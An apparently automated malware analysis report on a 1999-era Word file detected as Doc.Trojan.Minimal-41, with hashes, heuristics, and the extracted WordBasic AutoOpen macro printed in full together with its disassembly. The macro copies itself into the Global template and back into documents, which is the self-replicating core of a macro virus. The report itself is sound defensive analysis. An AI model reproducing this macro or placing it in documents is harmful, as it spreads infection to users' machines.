Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d11d6b8eb0dcdde…

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-05-09 18:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 68bbc784e031e49b8549049515bf41e7 SHA-1: 9f0151a1af345ada0cb02c99e4bd34a049822619 SHA-256: 0d11d6b8eb0dcdde0a2581d8a6e5e66b5a2b7b994cb7ab4dffdbd9b52cdc63ad
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoOpen macro. The macro's primary function appears to be copying itself using the MacroCopy function, which could be an attempt to ensure execution or establish persistence. No other malicious functionality was directly observed in the provided evidence.

Heuristics 4

  • ClamAV: Doc.Trojan.Minimal-41 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Minimal-41
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1308 bytes
SHA-256: 18a10057f0a7ee96ead684db5fc91dc3a8befcf634c46686f428427d65f18e5a
Detection
ClamAV: Doc.Trojan.Minimal-41
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim a$
Dim b$
Dim c$
c$ = WordBasic.[FileName$]()
On Error Resume Next: a$ = c$ + ":AutoopeN"
b$ = "Global:aUTOOPEn": WordBasic.MacroCopy a$, b$
WordBasic.MacroCopy b$, a$
End Sub

' Processing file: /opt/analyzer/scan_staging/acf5dc72de5344d5b88a32b7902321a5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 1242 bytes
' Line #0:
' 	FuncDefn (Public Sub MAIN())
' Line #1:
' 	Dim 
' 	VarDefn a
' Line #2:
' 	Dim 
' 	VarDefn B
' Line #3:
' 	Dim 
' 	VarDefn c
' Line #4:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	St c$ 
' Line #5:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Ld c$ 
' 	LitStr 0x0009 ":AutoopeN"
' 	Add 
' 	St a$ 
' Line #6:
' 	LitStr 0x000F "Global:aUTOOPEn"
' 	St B$ 
' 	BoS 0x0000 
' 	Ld a$ 
' 	Ld B$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #7:
' 	Ld B$ 
' 	Ld a$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #8:
' 	EndSub